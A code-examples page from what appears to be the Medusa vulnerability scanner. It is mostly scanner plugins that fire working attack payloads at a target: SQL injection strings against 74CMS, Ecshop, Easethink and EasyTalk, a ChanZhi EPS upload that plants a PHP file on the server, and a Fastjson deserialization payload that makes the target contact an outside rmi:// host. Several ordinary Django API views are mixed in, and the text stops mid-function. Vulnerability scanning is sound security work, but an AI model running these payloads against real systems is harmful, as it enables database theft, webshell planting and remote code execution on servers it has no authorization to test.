Beispiel #1
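def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe one target for the 74CMS ``ajax_user.php`` SQL injection and record a hit.

    A single POST is sent with the test string in the ``email`` form field.
    The target is reported only when the response body contains the marker
    ``4a8a08f09d37b73795649038408b5f33``.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails`` with a finding.

    Returns:
        None. Findings and errors go through the project's
        ``VulnerabilityDetails``, ``WriteFile`` and ``ErrorLog`` helpers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Default port for the scheme; any other scheme leaves the port as None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/plus/ajax_user.php?act=check_email"
        data = "email=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),2,1))>100 as signed) %23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        # The session is used as a context manager so its connection pool is
        # released even when the request raises.
        # verify=False turns off TLS certificate validation for this request.
        with requests.session() as s:
            resp = s.post(payload_url,
                          data=data,
                          headers=headers,
                          timeout=6,
                          verify=False)
        con = resp.text
        if con.find('4a8a08f09d37b73795649038408b5f33') != -1:
            # The finding embeds the whole response body, so the stored report
            # can contain data returned by the target.
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the host and the scan result to the details writer.
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Result file is named after the host; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the host together with the plugin name that failed.
        ErrorLog().Write(url, _)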
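def medusa(**kwargs) -> None:
    """Check one target for the ChanZhi EPS package-upload issue and record a hit.

    The check POSTs a small PHP file to the package upload endpoint, then
    requests the path where that file would land. The target is reported when
    the second response contains ``4a8a08f09d37b73795649038408b5f33``.

    NOTE(review): no clean-up request is visible here, so a positive check
    appears to leave ``php.php`` on the target; removal has to be handled by
    the operator within the agreed scope of the assessment.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Header dict sent with both requests.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target base URL
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = '/chanzhi/admin.php?m=package&f=upload'
        verify = '/chanzhi/system/tmp/package/php.php'
        payload_url = url + payload
        verify_url = url + verify
        data = """
------WebKitFormBoundaryGgFOYWAluy1F8lvn
Content-Disposition: form-data; name="file"; filename="php.php"
Content-Type: text/php

<?php echo md5(c);>
------WebKitFormBoundaryGgFOYWAluy1F8lvn--
                    """
        # verify=False turns off TLS certificate validation for both requests.
        requests.post(payload_url,
                      data=data,
                      headers=Headers,
                      proxies=proxies,
                      timeout=6,
                      verify=False)
        resp = requests.get(verify_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在ChanZhiEPSGetShell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the response and the caller's kwargs to the details writer.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Result file is named after the URL; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() instead of "+" so the handler cannot raise a second
        # TypeError when Url was not supplied or the plugin name is None.
        ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)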
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe one target for the 74CMS ``admin_baiduxml.php`` SQL injection.

    One POST is sent to the ``setsave`` action. The target is reported when
    the response contains both ``Error:Query error`` and ``value='aaa'``.

    Args:
        Url: Target URL, split by ``UrlProcessing``.
        RandomAgent: Value for the ``User-Agent`` header.
        Token: Passed on to ``VulnerabilityDetails`` with a finding.
        proxies: Raw proxy setting, normalised by ``Proxies().result``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default; unknown schemes keep None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        path = '/upload/admin/admin_baiduxml.php?ac=setsave'
        form = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + path
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        # verify=False: TLS certificate validation is switched off here.
        resp = requests.post(payload_url,
                             data=form,
                             headers=request_headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        body = resp.text
        status = resp.status_code
        hit = "Error:Query error" in body and "value='aaa'" in body
        if hit:
            template = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n"
            Medusa = template.format(url, payload_url, body)
            info = VulnerabilityInfo(Medusa)
            # Store the finding, then write the per-target result file.
            VulnerabilityDetails(info.info, url, Token).Write()
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # Log the host and the name of the plugin that failed.
        ErrorLog().Write(url, plugin_name)
Beispiel #4
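def medusa(**kwargs) -> None:
    """Check one target for Fastjson deserialization using an out-of-band DNS callback.

    A JSON body is POSTed to the target URL with a host name obtained from
    ``Dnslog``. The target is reported when ``DL.result()`` is truthy and the
    HTTP status is 400.

    Keyword Args:
        Url: URL that receives the JSON body.
        Headers: Header dict from the caller; it is copied before use.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload_url = url
        DL = Dnslog()
        data = '''{
        "a": {
            "@type": "java.lang.Class",
            "val": "com.sun.rowset.JdbcRowSetImpl"
        },
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName": "rmi://%s/Exploit",
            "autoCommit": true
        }
    }
    ''' % DL.dns_host()

        # Work on a copy: writing into the caller's dict would leak this
        # plugin's Content-Type/Connection headers into every later user of
        # the same Headers object.
        request_headers = dict(Headers)
        request_headers['Content-Type'] = 'application/json'
        request_headers["Connection"] = "close"
        # verify=False turns off TLS certificate validation for this request.
        resp = requests.post(payload_url,
                             headers=request_headers,
                             data=data,
                             proxies=proxies,
                             timeout=10,
                             verify=False)
        if DL.result() and resp.status_code == 400:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # Hand the response and the caller's kwargs to the details writer.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Result file is named after the URL; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() instead of "+" so the handler cannot raise a second
        # TypeError when Url was not supplied or the plugin name is None.
        ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)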
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe one target for the Easethink cookie SQL injection.

    A POST to ``/index.php`` carries the test expression in the
    ``sort_field_idx`` cookie. The target is reported when the status is 200
    and the body contains ``c4ca4238a0b923820dcc509a6f75849``.

    Args:
        Url: Target URL, split by ``UrlProcessing().result``.
        RandomAgent: Value for the ``User-Agent`` header.
        proxies: Raw proxy setting, normalised by ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails`` with a finding.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        # Scheme default; unknown schemes keep None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        path = "/index.php"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + path
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: TLS certificate validation is switched off here.
        resp = requests.post(payload_url,
                             headers=request_headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        body = resp.text
        status = resp.status_code
        if status == 200 and "c4ca4238a0b923820dcc509a6f75849" in body:
            template = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n"
            Medusa = template.format(url, payload_url, body)
            info = VulnerabilityInfo(Medusa)
            # Store the finding, then write the per-target result file.
            VulnerabilityDetails(info.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # Record which plugin failed against which host.
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe one target for the 74CMS ``admin_category.php`` SQL injection.

    One POST is sent to the ``edit_color_save`` action. The target is reported
    when the response contains ``4a8a08f09d37b73795649038408b5f33``.

    Args:
        Url: Target URL, split by ``UrlProcessing``.
        RandomAgent: Value for the ``User-Agent`` header.
        proxies: Raw proxy setting, normalised by ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails`` with a finding.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default; unknown schemes keep None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        path = '/upload/admin/admin_category.php?ac=edit_color_save'
        form = "val=xx&id=1 union select md5(c),2,3,4"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + path
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        # verify=False: TLS certificate validation is switched off here.
        resp = requests.post(payload_url,
                             data=form,
                             headers=request_headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        body = resp.text
        status = resp.status_code
        if "4a8a08f09d37b73795649038408b5f33" in body:
            template = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n"
            Medusa = template.format(url, payload_url, body)
            info = VulnerabilityInfo(Medusa)
            # Store the finding, then write the per-target result file.
            VulnerabilityDetails(info.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # Log the host and the name of the plugin that failed.
        ErrorLog().Write(url, plugin_name)
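def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe one target for the 74CMS ``ajax_common.php`` hotword SQL injection.

    One GET is sent with the test expression in the ``query`` parameter. The
    target is reported when the response contains
    ``5cee14937d463a819651c8e1c504613c``. Only this marker request is made;
    the check reads no application data.

    Args:
        Url: Target URL, split by ``UrlProcessing``.
        RandomAgent: Value for the ``User-Agent`` header.
        proxies: Raw proxy setting, normalised by ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails`` with a finding.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Default port for the scheme; any other scheme leaves the port as None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False turns off TLS certificate validation for this request.
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        if con.find('5cee14937d463a819651c8e1c504613c') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the host and the caller's kwargs to the details writer.
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Result file is named after the host; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the host together with the plugin name that failed.
        ErrorLog().Write(url, _)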
Beispiel #8
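def GenerateWord(request):
    """Build a Word report for one scan and return its file name as JSON.

    The JSON body must carry ``sid`` (scan id) and ``token``. The token is
    resolved to a user with ``QueryUserNameWithToken`` and the scan data is
    then looked up with both ``sid`` and that user, so the query is scoped to
    the caller.

    Returns:
        JsonResponse with ``code`` 200 and the generated file name, 404 when
        report generation fails, 403 when the token resolves to no user, and
        500 on an exception or a non-POST request.
    """
    RequestLogRecord(request, request_api="generate_word")
    if request.method != "POST":
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
    try:
        # Parse the body once; sid and token identify the scan and the caller.
        body = json.loads(request.body)
        Sid = body["sid"]
        UserToken = body["token"]
        # Resolve the token to a user; None means the token is unknown.
        UserName = UserInfo().QueryUserNameWithToken(UserToken)
        UserOperationLogRecord(request,
                               request_api="generate_word",
                               uid=UserName)
        if UserName is None:
            # Previously this path fell through and the view returned None,
            # which is not a valid response object.
            return JsonResponse({
                'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
                'code': 403,
            })
        # Fetch the vulnerability list and target URL for this user's scan.
        VulnerabilityDataList, Url = MedusaQuery().QueryBySid(sid=Sid,
                                                              uid=UserName)
        WordDownloadFileName = GenerateWordReport(
            VulnerabilityDataList=VulnerabilityDataList, target_url=Url)
        if WordDownloadFileName is None:
            return JsonResponse({
                'message': '报告生成失败了!🐈',
                'code': 404,
            })
        # Record who owns the generated file so later queries can check it.
        ReportGenerationList().Write(sid=Sid,
                                     uid=UserName,
                                     file_name=WordDownloadFileName)
        return JsonResponse({
            'message': WordDownloadFileName,
            'code': 200,
        })
    except Exception as e:
        ErrorLog().Write("Web_Api_GenerateReport_GenerateWord(def)", e)
        return JsonResponse({
            'message': '莎酱被玩坏啦(>^ω^<)喵',
            'code': 500,
        })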
Beispiel #9
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe one target for the Ecshop ``affiliate_ck.php`` SQL injection.

    One POST is sent with the test expression in the ``auid`` query
    parameter. The target is reported when the response contains
    ``4a8a08f09d37b73795649038408b5f33``.

    Args:
        Url: Target URL, split by ``UrlProcessing().result``.
        RandomAgent: Value for the ``User-Agent`` header.
        proxies: Raw proxy setting, normalised by ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails`` with a finding.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        # Scheme default; unknown schemes keep None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        path = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)"
        form = "status=1&order_sn=2"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + path
        request_headers = {
            'User-Agent': RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        # verify=False: TLS certificate validation is switched off here.
        resp = requests.post(payload_url,
                             headers=request_headers,
                             data=form,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        body = resp.text
        status = resp.status_code
        if "4a8a08f09d37b73795649038408b5f33" in body:
            template = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n"
            Medusa = template.format(url, payload_url, body)
            info = VulnerabilityInfo(Medusa)
            # Store the finding, then write the per-target result file.
            VulnerabilityDetails(info.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # Log the host and the name of the plugin that failed.
        ErrorLog().Write(url, plugin_name)
Beispiel #10
def DeleteProject(request):
    """Delete one of the caller's XSS projects and answer with a JSON status.

    The JSON body supplies ``token`` and ``project_name``. The token is
    resolved to a uid and the delete is issued with that uid, so it is scoped
    to the caller's own projects.

    Returns:
        JsonResponse with ``code`` 200 on success, 170 when the delete fails,
        403 for an unknown token, 169 on an exception, 500 for non-POST.
    """
    api_name = "delete_cross_site_script_project"
    RequestLogRecord(request, request_api=api_name)
    if request.method != "POST":
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
    try:
        UserToken = json.loads(request.body)["token"]
        ProjectName = json.loads(request.body)["project_name"]
        # Resolve the token to a uid; None means the token is unknown.
        Uid = UserInfo().QueryUidWithToken(UserToken)
        if Uid != None:
            UserOperationLogRecord(request, request_api=api_name, uid=Uid)
            deleted = CrossSiteScriptProject().Delete(
                uid=Uid, project_name=ProjectName)
            if deleted:
                reply = {'message': "删除成功~", 'code': 200}
            else:
                reply = {'message': "项目删除失败!", 'code': 170}
            return JsonResponse(reply)
        return JsonResponse({
            'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
            'code': 403,
        })
    except Exception as e:
        ErrorLog().Write(
            "Web_CrossSiteScriptHub_CrossSiteScript_DeleteProject(def)", e)
        return JsonResponse({
            'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
            'code': 169,
        })
Beispiel #11
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe one target for the 74CMS ``ajax_officebuilding.php`` SQL injection.

    One GET is sent with the test expression in the ``key`` parameter. The
    target is reported when the response contains
    ``3438d5e3ead84b2effc5ec33ed1239f5``.

    Args:
        Url: Target URL, split by ``UrlProcessing``.
        RandomAgent: Value for the ``User-Agent`` header.
        proxies: Raw proxy setting, normalised by ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails`` with a finding.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default; unknown schemes keep None.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        path = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + path
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: TLS certificate validation is switched off here.
        resp = requests.get(payload_url,
                            headers=request_headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        body = resp.text
        status = resp.status_code
        if '3438d5e3ead84b2effc5ec33ed1239f5' in body:
            template = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n"
            Medusa = template.format(url, payload_url, body)
            info = VulnerabilityInfo(Medusa)
            # Store the finding, then write the per-target result file.
            VulnerabilityDetails(info.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # Record which plugin failed against which host.
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
Beispiel #12
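def UpdateShowName(request):
    """Change the display name of the user identified by the request token.

    The JSON body supplies ``token`` and ``new_show_name``. The token is
    resolved to a uid and the update is issued for that uid only.

    Returns:
        JsonResponse with ``code`` 200 on success, 404 when the update is
        rejected, 403 for an unknown token, and 500 on an exception or a
        non-POST request.
    """
    RequestLogRecord(request, request_api="update_show_name")
    if request.method != "POST":
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
    try:
        body = json.loads(request.body)
        Token = body["token"]
        # NOTE(review): new_show_name is passed on as received; no length or
        # character validation is visible here. Confirm it is validated in
        # UserInfo.UpdateShowName or escaped wherever it is rendered.
        NewShowName = body["new_show_name"]
        # Resolve the token to a uid; None means the token is unknown.
        Uid = UserInfo().QueryUidWithToken(Token)
        if Uid is None:
            return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        # Log the operation only once the caller is identified.
        UserOperationLogRecord(request, request_api="update_show_name", uid=Uid)
        if UserInfo().UpdateShowName(uid=Uid, show_name=NewShowName):
            return JsonResponse({'message': '好诶!修改成功~', 'code': 200, })
        return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, })
    except Exception as e:
        ErrorLog().Write("Web_BasicFunctions_User_UpdateShowName(def)", e)
        # Without this return the view handed None back to the framework
        # after any exception (bad JSON, missing key, database error).
        return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, })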
Beispiel #13
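def UpdateKey(request):
    """Replace the key of the user identified by the request token.

    The JSON body supplies ``token``. A new 40-character key is generated
    with ``randoms().result(40)`` and stored for the resolved uid.

    Returns:
        JsonResponse with ``code`` 200 on success, 404 when the update is
        rejected, 403 for an unknown token, and 500 on an exception or a
        non-POST request.
    """
    RequestLogRecord(request, request_api="update_key")
    if request.method != "POST":
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
    try:
        Token = json.loads(request.body)["token"]
        # Random key; the original author accepts the small chance of a
        # collision with an existing key.
        # NOTE(review): this value becomes a user credential. The generator
        # is not visible here; confirm randoms().result() draws from a
        # CSPRNG such as the `secrets` module rather than `random`.
        NewKey = randoms().result(40)
        # Resolve the token to a uid; None means the token is unknown.
        Uid = UserInfo().QueryUidWithToken(Token)
        if Uid is None:
            return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        # Log the operation only once the caller is identified.
        UserOperationLogRecord(request, request_api="update_key", uid=Uid)
        if UserInfo().UpdateKey(uid=Uid, key=NewKey):
            return JsonResponse({'message': '呐呐呐呐!修改成功了呢~', 'code': 200, })
        return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, })
    except Exception as e:
        ErrorLog().Write("Web_BasicFunctions_User_UpdateKey(def)", e)
        # Without this return the view handed None back to the framework
        # after any exception (bad JSON, missing key, database error).
        return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, })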
Beispiel #14
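def Creation(request):
    """Create an e-mail project for the caller and return its key as JSON.

    The JSON body supplies ``token``. A 10-character project key is generated
    with ``randoms().result(10)`` and written for the resolved uid.

    Returns:
        JsonResponse with ``code`` 200 and the new key, 505 when the write
        fails, 403 for an unknown token, and 500 on an exception or a
        non-POST request.
    """
    RequestLogRecord(request, request_api="create_email_project")
    if request.method != "POST":
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
    try:
        Token = json.loads(request.body)["token"]
        # Resolve the token to a uid; None means the token is unknown.
        Uid = UserInfo().QueryUidWithToken(Token)
        if Uid is None:
            return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        # Log the operation only once the caller is identified.
        UserOperationLogRecord(request, request_api="create_email_project", uid=Uid)
        # NOTE(review): if this key is later used to look the project up
        # without further authentication, confirm randoms().result() is
        # backed by a CSPRNG; the generator is not visible here.
        Key = randoms().result(10)
        if EmailProject().Write(uid=Uid, project_key=Key):
            return JsonResponse({'message': Key, 'code': 200, })
        return JsonResponse({'message': "创建失败!", 'code': 505, })
    except Exception as e:
        ErrorLog().Write("Web_Email_EmailProject_Creation(def)", e)
        # Without this return the view handed None back to the framework
        # after any exception (bad JSON, missing key, database error).
        return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, })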
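    def VulnerabilityDistribution(self, **kwargs):
        """Count one user's ``Medusa`` rows per timestamp inside a time window.

        Keyword Args:
            uid: User whose rows are counted.
            start_time: Lower bound of the window (inclusive).
            end_time: Upper bound of the window (inclusive).

        Returns:
            A list of ``(timestamp, count)`` tuples sorted by timestamp, or
            None when the query or the sort raises.
        """
        Uid = kwargs.get("uid")
        StartTime = kwargs.get("start_time")
        EndTime = kwargs.get("end_time")
        try:
            # Parameterised query: the caller-supplied values never become
            # part of the SQL text.
            self.cur.execute("select timestamp from Medusa where uid =? and timestamp<=? and timestamp>=?", (Uid, EndTime, StartTime,))
            # Single pass over the rows; the earlier list.count() per distinct
            # value rescanned the whole result for every timestamp.
            CountDict = {}
            for row in self.cur.fetchall():
                CountDict[row[0]] = CountDict.get(row[0], 0) + 1
            return sorted(CountDict.items(), key=lambda item: item[0])
        except Exception as e:
            ErrorLog().Write("Web_WebClassCongregation_HomeInfo(class)_TimeDistribution(def)", e)
            return None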
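 def Query(self, **kwargs) -> "bool | None":
     """Tell whether a generated report file belongs to the given user.

     Keyword Args:
         uid: User to check.
         file_name: Report file name to check.

     Returns:
         True when a ``ReportGenerationList`` row matches both values, False
         when none does, None when the query raises. Callers that use this as
         an ownership check should treat None like False.
     """
     Uid = kwargs.get("uid")
     FileName = kwargs.get("file_name")
     try:
         # Parameterised query: both values are bound, not spliced into SQL.
         self.cur.execute(
             "select * from ReportGenerationList where file_name =? and uid=?",
             (
                 FileName,
                 Uid,
             ))
         # Any row means the file is recorded for this user.
         return bool(self.cur.fetchall())
     except Exception as e:
         ErrorLog().Write(
             "Web_WebClassCongregation_ReportGenerationList(class)_QueryTokenValidity(def)",
             e)
         return None
     finally:
         # The connection used to be closed only on a match, so every miss
         # and every error left it open.
         self.con.close()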
Beispiel #17
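 def TokenAuthentication(self, **kwargs: str) -> "bool | None":
     """Tell whether a user token exists in ``UserInfo``.

     Keyword Args:
         token: Token presented by the caller.

     Returns:
         True when a row carries this token, False when none does or no token
         was passed, None when the query raises. Callers should treat None as
         "not authenticated".
     """
     Token = kwargs.get("token")
     try:
         if Token is None:
             return False
         # Parameterised query: the token is bound, not spliced into SQL.
         # NOTE(review): the lookup matches the token exactly as stored;
         # consider storing only a hash of the token so a database leak does
         # not expose usable tokens.
         self.cur.execute("select * from UserInfo where token =?",
                          (Token, ))
         # Any row means the token is known.
         return bool(self.cur.fetchall())
     except Exception as e:
         ErrorLog().Write(
             "Web_WebClassCongregation_UserInfo(class)_TokenAuthentication(def)",
             e)
         return None
     finally:
         # The connection used to be closed only on a match, so every miss
         # and every error left it open.
         self.con.close()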
Beispiel #18
def Monitor():
    """Sample memory and CPU utilisation with psutil and store one record.

    The sample is written through ``HardwareUsageRateInfo().Write``; any
    exception is logged through ``ErrorLog`` and swallowed.
    """
    try:
        mem = psutil.virtual_memory()  # full memory statistics
        # used = total physical memory - available memory
        used_bytes = mem.total - mem.available
        free_bytes = mem.available
        used_percent = mem.percent
        cpu_total = psutil.cpu_percent(1)  # overall CPU usage
        cpu_per_core = psutil.cpu_percent(percpu=True)  # usage per CPU
        # Persist the sample; the per-core list is stored as its str() form.
        HardwareUsageRateInfo().Write(
            memory_free=free_bytes,
            memory_percent=used_percent,
            memory_used=used_bytes,
            central_processing_unit_usage_rate=cpu_total,
            per_core_central_processing_unit_usage_rate=str(cpu_per_core))

    except Exception as e:
        ErrorLog().Write("Web_SystemInfo_HardwareInfo_Monitor(def)", e)
Beispiel #19
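def medusa(**kwargs) -> None:
    """Probe one target for the EasyTalk ``keyword`` SQL injection.

    One GET is sent with the test expression in the ``keyword`` parameter.
    The target is reported when the status is 200 and the body contains
    ``4a8a08f09d37b73795649038408b5f33``.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Header dict sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target base URL
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/?m=app&a=myapp&keyword=yu%'union select 1,2,3,4,md5(c),6,7,8,9,10,11,12,13,14,15,16,17#"
        payload_url = url + payload

        # verify=False turns off TLS certificate validation for this request.
        resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
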